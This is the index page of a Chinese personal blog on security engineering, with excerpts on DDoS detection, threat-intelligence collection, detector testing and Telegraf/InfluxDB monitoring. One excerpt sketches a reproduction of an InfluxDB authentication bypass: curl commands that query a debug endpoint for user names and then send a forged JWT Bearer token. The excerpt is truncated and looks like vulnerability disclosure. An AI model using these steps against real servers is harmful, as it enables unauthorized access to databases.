碳基体的博客

记录是梳理思路的好方式

DDoS攻击误报的那些事

DDoS攻击事件评估

1. 前言 DDoS攻击是互联网上最古老的攻击,这是一场军备竞赛,攻方的矛是庞大的僵尸网络,守方的盾则是背靠运营商,大力建机房。 纵观DDoS防御发展,会发现技能点长在如何在攻击时刻快速卸载掉攻击流量。例如: 机房建设: 与拥有带宽资源的厂商合作,例如运营商,云厂商、CDN厂商 高性能数据包处理:可编程交换机、25G网卡、dpdk 业务可用性:监测集群/防御转发集群/清洗集群...

Posted by tanjiti on September 22, 2023

那些年我研发的80%有用模块——攻击事件评估模块

DDoS攻击事件/CC攻击事件评估

1. 模块功能 DDoS攻击事件评估 检测防御能力评估 检测能力 误报:将正常的流量突发识别为攻击 流量调度 业务热点活动 API周期性调用 漏报:...

Posted by tanjiti on November 17, 2022

那些年我研发的50%有用模块——全流量情报采集模块

IoC情报与资产失陷情报

1. 模块功能 1.1 IoC情报生产 分析网络流量,提取恶意文件、风险Domain、IP等IoC情报信息 恶意样本IoC 网络流量中提取恶意样本 恶意样本投递URL地址 恶意样本文件 恶意样本分析 c2 bot 攻击指令 Domain IoC Pass...

Posted by tanjiti on October 28, 2022

那些年我研发的无用模块——业务异常审计模块

业务异常审计

1. 模块功能 异常检测:发现用户可见数据的异常 异常响应:采用报警与工单来推进异常模块修复 异常修复:受损数据修复 这个流程,和网络安全监控是非常像的。网络基础安全是从运维部门细分出来的,方法的继承自然不奇怪了。 观察运维近些年的发展,能给安全建设带来些启发,比如说:SRE、AIOps、自动化编排、混沌工程、云原生可观测性...

Posted by tanjiti on October 28, 2022

那些年我研发的无用模块——攻击样本回放模块

攻击样本回放

1. 模块功能 实时检测策略白盒测试模块,用于 使用攻击正样本,发现漏报 使用攻击负样本,发现误报 2. 实现方法 将攻击时的数据进行录制(包括采集、标记、格式化),然后流式序列化回放给实时检测模块,最后通过对比检测结果,来评估实时检测策略的有效性。 具体包括: 2.1 样本采集管理: 样本采集:自动化采集(监听实时攻...

Posted by tanjiti on October 28, 2022

TICK-telegraf 日志监控实例-自定义日志采集

inputs.logparser 插件

预备知识 telegraf日志监控实例 telegraf的inputs.logparser吸取了logstash的grok精髓 语法 1 %{<capture_syntax>[:<semantic_name>][:<modifier>]} 第一个字段: pattern,先查看已有的pattern是否能满足,否则采用自定义pattern ...

Posted by tanjiti on July 30, 2020

TICK-telegraf 日志监控实例

inputs.logparser 插件

原理:通过telegraf将端上的log采集输出到influxdb,然后使用grafana进行数据可视化 场景1:监控web访问日志 采集设置 1 2 3 4 5 6 [agent] interval = "1s" flush_interval = "1s" precision = "s" hostname = "xxxx" 输出设置 1 2 3 4 5 6 7 8 [...

Posted by tanjiti on June 13, 2019

influxdb认证绕过0day

通过jwt token绕过认证

0day复现步骤: 1. 查找user name curl -G "http://xxx:8086/debug/requests" 2. 构造jwt token 在线构造地址 3. 构造认证头 curl -G 'http://xxx:8086/query' --data-urlencode 'q=show users' -H 'Authorization: Bearer eyJ...

Posted by tanjiti on May 31, 2019

开源telegraf操作手册

数据管道

基本概念 数据管道,输入输出端协商好格式,然后进行数据采集input、数据清理process、数据聚合aggregator、数据转发output,与logstash类似,但更强大,有非常多的插件 部署 安装 mac 1 2 brew update brew install telegraf 配置文件 /usr/local/etc/telegraf.conf centos 1 2 w...

Posted by tanjiti on February 26, 2019

开源chronograf操作手册

时序数据可视化与kapacitor TICK编辑器

基本概念 提供influxdb系统管理、kapacitor TICK脚本编辑与数据可视化。 我主要使用它进行tick脚本编辑,可视化的部分用的是鼎鼎有名的grafana 部署 安装 mac brew install chronograf centos wget https://dl.influxdata.com/chronograf/releases/chronograf-1....

Posted by tanjiti on February 26, 2019

FEATURED TAGS
influxdb telegraf 时序数据库 无用模块 漏报 误报 grok logparser
ABOUT ME

回声室效应
当我们预设了观点、话题,只选择让我们愉悦的信息领域,聚集类似的信息和同样的观点,而隔离其他领域的信息和异己的声音,就会让我们原本的观点得到印证和强化

FRIENDS